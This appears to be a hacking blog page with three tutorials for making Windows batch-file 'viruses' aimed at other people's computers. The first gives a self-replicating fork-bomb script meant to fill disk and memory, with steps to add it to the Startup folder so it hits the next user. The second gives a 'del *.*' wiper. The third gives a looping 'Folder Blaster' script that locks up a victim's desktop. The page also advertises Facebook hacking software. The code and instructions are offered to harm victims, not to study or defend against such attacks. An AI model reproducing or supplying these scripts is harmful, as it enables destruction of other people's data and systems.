Sheeraz Hacks Production We Hack For You: batch vairus
Showing posts with label batch vairus. Show all posts
Showing posts with label batch vairus. Show all posts

Wednesday 13 May 2015

Overloading Memory-How To Make Virus

Posted by SHeeraz Ali 
Overloading Memory

Batch file is the name given to a type of script file, a text file containing a series of commands to be executed by the command interpreter.
A batch file may contain any command the interpreter accepts interactively at the command prompt. A batch file may also have constructs (IF, GOTO, Labels, CALL, etc.) that enable conditional branching and looping within the batch file.

Batch files usually have extensions : *.bat
They can be easily created in any word editor like notepad, wordpad.

In this tutorial you will learn how to create one of the simplest yet deadliest virus programs in the form of a batch file. This 6-line piece of code is so devastating, it can bring down a computer in a matter of seconds. (Well, at least it could a couple decades back)

Explanation: This batch file creates another batch file in the same directory, then copies itself into each of these newly created files. These files are then started up. Of course, they are identical so both of them start up again and repeat the process until the computer runs out of memory and crashes (or the antivirus catches it).

What this will do, if you leave it on long enough (about a couple minutes), is it will create so many copies of itself on the hard drive that all the empty space has been filled with these bats. Also it will use up all the computer's RAM as it is being told to run an ever-increasing number of the same processes, which over time gets too much for it to handle.
Depending on what runs out first hard disk space or RAM, the batch file may or may not cause permanent damage. In both cases, however, the computer will almost definitely crash, the operating system may be corrupted and on the next start up, you will be greeted by the well-known "Blue Screen Of Death". The only way to get rid of it will be to format your hard drive and re-install the operating system.

Further, we can have this beautiful file executed at startup, as a surprise for the unfortunate user who will happen to start the computer the next time.

NOTE: I cannot stress this enough- This is not a game. This tutorial is very dangerous (if you do it incorrectly) and for your own sake should never be actually performed. On execution, the computer will stop responding immediately and if the plug is not pulled off within 4-5 seconds (the program cannot be stopped after starting), there is a possibility of complete data loss and corruption of the hard drive.
With that out of the way, Here's how to do it :

Step 1 : Open a word editor like Notepad.

Step 2 : Type in the following code ->


@echo off
:A
SET /A x=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A

Step 3 :Save the File as "damage.bat" (or whatever) and we're done!

(Optional) Step 4 :To make this file execute automatically at startup, Do the following. Create a shortcut of the damage.bat file by right clicking on it. Open the start menu, In programs Open Startup folder and simply drag or cut-paste the shortcut into this folder. The virus will break loose the next time the computer is started up.

P.S. - If that sounded too easy to be true, it is. The thing is, this example is so basic it is known to 100% of all the antivirus softwares. Chances are if you do have even a really bad and outdated antivirus, it will most probably not even let you create this file or immediately delete it, as I experienced with my AVAST antivirus. But there are ways to get around this, which we'll look into later on.

Overloading Memory-How To Make Virus

Wiping Out Memory-How To Crush Someone Computer

Posted by SHeeraz ALi 
Wiping Out Memory-How To Crush Someone Computer
How To Make Overloading Memory VIRUS 

In the previous tutorial, we overloaded the computer's memory, now we're going to wipe it all off. :-) This is a short and easy one.

Step 1: Open up Notepad.

Step 2: Type : del *.*

Step 3: Save it as a .bat file(For eg. Any_name.bat)

That's it! In this command, "del" is for deleting and the following text specifies the file to be deleted(Along with Directory).
Putting a '*' before the '.' means that no matter what the file's name is, it will be deleted. Putting a '*' after the '.' means that no matter what the file's type is, it will be deleted. Combined, it means that whatever file is encountered by the .Bat it will be wiped off completely. In quite a lot of programming languages, a "*" signifies "all" or "everything".

Again, this is quite dangerous to a system without antivirus as nothing will be left when this guy is done. Although technically, the system will crash as soon as the .bat file encounters some vital file required for the computer to work hence crashing it.
On an average system this should take less than a minute to do it's thing after which Windows will be corrupted and the only way to use the computer, would be to install the operating system again.

Wiping Out Memory-How To Crush Someone Computer

Folder Blaster-Make Virus

Posted by SHeeraz ALi 
Folder Blaster-Make Virus
Flooder blaster
Most of the commands we use to make batch files are actually the same commands first implemented in MS-DOS (An ancient microsoft OS). These DOS(Disk Operating System) commands can also be used in the command prompt window. Whatever your batch file does, you can do it through the command line interface (CLI). 
Start "Run", or hit [Windows key + R]. Type "cmd", and you're presented with the CLI. You can type "help" to get a list of commonly used commands and their functions. I recommend you try out each and every single command you can find. Hacking is getting more and more user friendly everyday, CLIs are being replaced by GUIs (Graphical User Interfaces) - meaning in most places you won't have to actually type in the commands, you can just select an option and press a button. But as of now, this is a work in progress. With more advanced hacking techniques, specially the ones that involve using BackTrack tools, you will find that majority of the hacks are still done through the CLI (More on this, later). 

You will soon be learning how to hack into a remote computer and get the CMD window of the victim's computer. Hence, I recommend getting used to the CLI, as soon as possible, as much as possible. Before getting to the code, let's take a look at a couple of commands. 

md - (or mkdir) - Make Directory. This command is used to create a directory (a folder). The command: 
md abcd 
..will create a folder in the current directory named "abcd". 

cd - Change Directory. This command is used to change the current directory. The following command: 
cd C:\\ 
..will take the program (your batch file) to the Root folder and: 
cd C:\\Users 
..will take you to the folder called Users in the C drive. You can change where you "mkdir" by using "CD". (You can now create folders in any directory you like) 

Here we've got the Folder Blaster virus. Again, this one's fairly easy to understand. What we're doing below is creating a bunch of folders, opening them all at once and keeping them open, effectively hogging a big portion of the screen and memory causing the windows to lag, freeze up and sometimes crash. 

@echo off 
cd ./Desktop 
md 1 
md 2 
md 3 
md 4 
md 5 
md 6 
md 7 
md 8 
md 9 
md 0 
:confirm 
start 1 
start 2 
start 3 
start 4 
start 5 
start 6 
start 7 
start 8 
start 9 
start 0 
goto confirm 

So, we begin by turning off echo. Then we change the directory to Desktop. Now we create ten folders with names 0-9. We setup a label and start opening up all the 10 folders. Now the final statement causes an infinite loop. Of course, if the folder is already opened it will not be opened again. But the use of this infinite loop is if the user attempts to close the folder, the loop is still going on and it will send a message to open that folder again. So the victim will be stuck as every time s/he closes a folder it opens up again, eventually making them give up and restart the system.The above code can be made much shorter with the use of LOOPs, as discussed below. We start by creating a variable and setting it's value to 0. We use this variable as a check to let the computer know when to come out of the loop. Take a look at the code first: 

@echo off 
set /a i=0 
:loop 
if %i%==10 goto end 
echo This is iteration %i%. 
set /a i=%i%+1 
goto loop 
:end 

"set" is used to define and initialize a variable. Here we create a variable called "i" and set it's value to zero. After setting up a label, we check if the value of the variable "i" (given by %i%) is equal to 10, and if it is we "goto" the label end (the program ends when this happens). Now we "echo" (send a message) to notify the user which iteration is currently running. In the next step we increment the value of "i" by one and then go back to the "if" statement. 

So the loop runs ten times (0-9), and then stops. The above was not a virus, but a simple program. Earlier, I told you that the above Folder Blaster virus code can be made shorter by using loops. You know how to make the virus, and now you know how to use loops. Combining the two of them, I leave as an exercise for the wannabe hacker. (HINT: See the folder names up top going from 0-9 ? You can just replace them with %i% in the above loop.)

Folder Blaster-Make Virus

download free facebook hacking software

Most Trending

Real Time Analytics